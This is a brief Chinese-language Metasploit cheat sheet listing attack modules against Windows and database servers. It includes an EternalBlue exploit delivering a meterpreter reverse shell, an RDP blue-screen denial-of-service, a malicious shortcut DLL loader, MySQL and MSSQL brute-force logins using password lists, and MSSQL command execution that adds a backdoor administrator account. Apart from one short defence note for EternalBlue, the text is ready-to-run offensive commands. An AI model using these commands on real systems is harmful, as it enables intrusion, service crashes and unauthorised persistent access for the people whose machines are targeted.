永恆之藍(ms17-010):

[445埠開啟]

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set rhost ip

run

防禦：
關閉445埠smb服務(網路共享服務)
開啟防火牆，設定445埠處的入站規則連線

藍屏攻擊(ms12-020):

[3389埠開啟]

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

set rhost ip

run

檔案共享(ms10-046):

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

 
set srvhost kaliip

run

mysql暴力登入:

探測：

use auxiliary/scanner/mysql/mysql_version

set rhosts ip

run

登入：

use auxiliary/scanner/mysql/mysql_login

set rhosts ip

set pass_file  password.txt

set user_file user.txt

run

mssql:

查詢mssql埠:

use auxiliary/scanner/mssql/mssql_ping

set rhost ip

run

(也可以用nmap -sV ip，但是效果不行)

mssql暴力破解:

use auxiliary/scanner/mssql/mssql_login

set rhost ip

set pass_file password.txt

set rport x

run

mssql命令執行(新增賬戶):

use auxiliary/admin/mssql/mssql_exec

set rhost ip

set rport

set cmd cmd.exe /c net user test 123 /add

run

set cmd cmd.exe /c net localgroup administrators test /add

run